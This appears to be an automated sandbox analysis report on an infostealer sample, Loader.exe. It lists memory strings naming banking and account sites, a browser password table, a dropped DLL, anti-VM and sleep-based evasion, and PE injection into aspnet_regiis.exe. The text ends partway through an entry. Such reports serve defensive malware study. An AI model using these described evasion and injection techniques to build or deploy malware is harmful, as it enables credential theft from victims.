Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CE660	5_2_6D7CE660
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D1650	5_2_6D7D1650
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DA640	5_2_6D7DA640
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D5E30	5_2_6D7D5E30
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D0E20	5_2_6D7D0E20
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7B96E0	5_2_6D7B96E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7BAED0	5_2_6D7BAED0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DBE90	5_2_6D7DBE90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D6E90	5_2_6D7D6E90
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D2950	5_2_6D7D2950
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7C1120	5_2_6D7C1120
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7EB1B5	5_2_6D7EB1B5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D91A0	5_2_6D7D91A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D8070	5_2_6D7D8070
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CF860	5_2_6D7CF860
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DE060	5_2_6D7DE060
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D5030	5_2_6D7D5030
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D2010	5_2_6D7D2010
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CC0D0	5_2_6D7CC0D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D10C0	5_2_6D7D10C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CF3F0	5_2_6D7CF3F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CB3F0	5_2_6D7CB3F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DA3D0	5_2_6D7DA3D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D8BA0	5_2_6D7D8BA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DC390	5_2_6D7DC390
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DCA60	5_2_6D7DCA60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D1250	5_2_6D7D1250
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CF240	5_2_6D7CF240
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CEA10	5_2_6D7CEA10
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CCA00	5_2_6D7CCA00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D42F0	5_2_6D7D42F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7D32E0	5_2_6D7D32E0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7CAAC0	5_2_6D7CAAC0

Source: C:\Users\user\Desktop\Loader.exe

Code function: String function: 6D7DEE80 appears 32 times

Source: Loader.exe, 00000005.00000002.1292260994.00000000014AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Loader.exe
Source: Loader.exe, 00000005.00000000.1277412094.0000000000F62000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameOliviaQuinn.hwqT vs Loader.exe
Source: Loader.exe	Binary or memory string: OriginalFilenameOliviaQuinn.hwqT vs Loader.exe

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Loader.exe

Static PE information: Section: nS5 ZLIB complexity 1.0003297852983988

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/2@2/1

Source: C:\Users\user\Desktop\Loader.exe

File created: C:\Users\user\AppData\Roaming\msvcp110.dll

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03

Source: Loader.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000008.00000003.1330389387.000000000596D000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1313796107.0000000005978000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1330799152.0000000005946000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1314274165.000000000595A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Loader.exe

ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Loader.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Loader.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Loader.exe

Unpacked PE file: 5.2.Loader.exe.f00000.0.unpack nS5:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: Loader.exe	Static PE information: section name: nS5
Source: Loader.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_00F5696B pushad ; ret	5_2_00F56976
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_00F58E8E push ss; ret	5_2_00F58F70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7B5D3A push FFFFFFB9h; ret	5_2_6D7B5D3C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7B5F50 push dword ptr [edx-166AE193h]; ret	5_2_6D7B5F5C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7EB8C1 push ecx; ret	5_2_6D7EB8D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B8AB6 push eax; ret	8_3_036B8AD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B8AB6 push eax; ret	8_3_036B8AD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B8AB6 push eax; ret	8_3_036B8AD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B8AB6 push eax; ret	8_3_036B8AD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036BFC60 push eax; iretd	8_3_036BFC69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036BFC60 push eax; iretd	8_3_036BFC69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036BFC60 push eax; iretd	8_3_036BFC69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036BFC60 push eax; iretd	8_3_036BFC69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036BFC60 push eax; iretd	8_3_036BFC69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036BFC60 push eax; iretd	8_3_036BFC69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 8_3_036B535F push esp; retf	8_3_036B5360

Source: Loader.exe

Static PE information: section name: nS5 entropy: 7.99947521126159

Source: C:\Users\user\Desktop\Loader.exe

File created: C:\Users\user\AppData\Roaming\msvcp110.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Loader.exe PID: 7224, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 3050000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 31C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 51C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 58B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 68B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 69E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 79E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 7EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 8EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Memory allocated: 9EB0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\msvcp110.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Loader.exe TID: 7320	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 7404	Thread sleep time: -210000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Loader.exe

Code function: 5_2_6D7E4D44 FindFirstFileExW,

5_2_6D7E4D44

Source: C:\Users\user\Desktop\Loader.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.00000000059A0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: aspnet_regiis.exe, 00000008.00000003.1423102544.000000000360C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000002.1424717867.000000000360C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW_e
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: aspnet_regiis.exe, 00000008.00000002.1424717867.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1329981970.0000000003653000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1423102544.0000000003653000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWR
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: aspnet_regiis.exe, 00000008.00000003.1330689177.000000000599B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

Code function: 5_2_6D7DED57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_6D7DED57

Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DED57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6D7DED57
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7E2C9D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_6D7E2C9D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 5_2_6D7DEA51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_6D7DEA51

Source: C:\Users\user\Desktop\Loader.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Loader.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 31F0000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Loader.exe

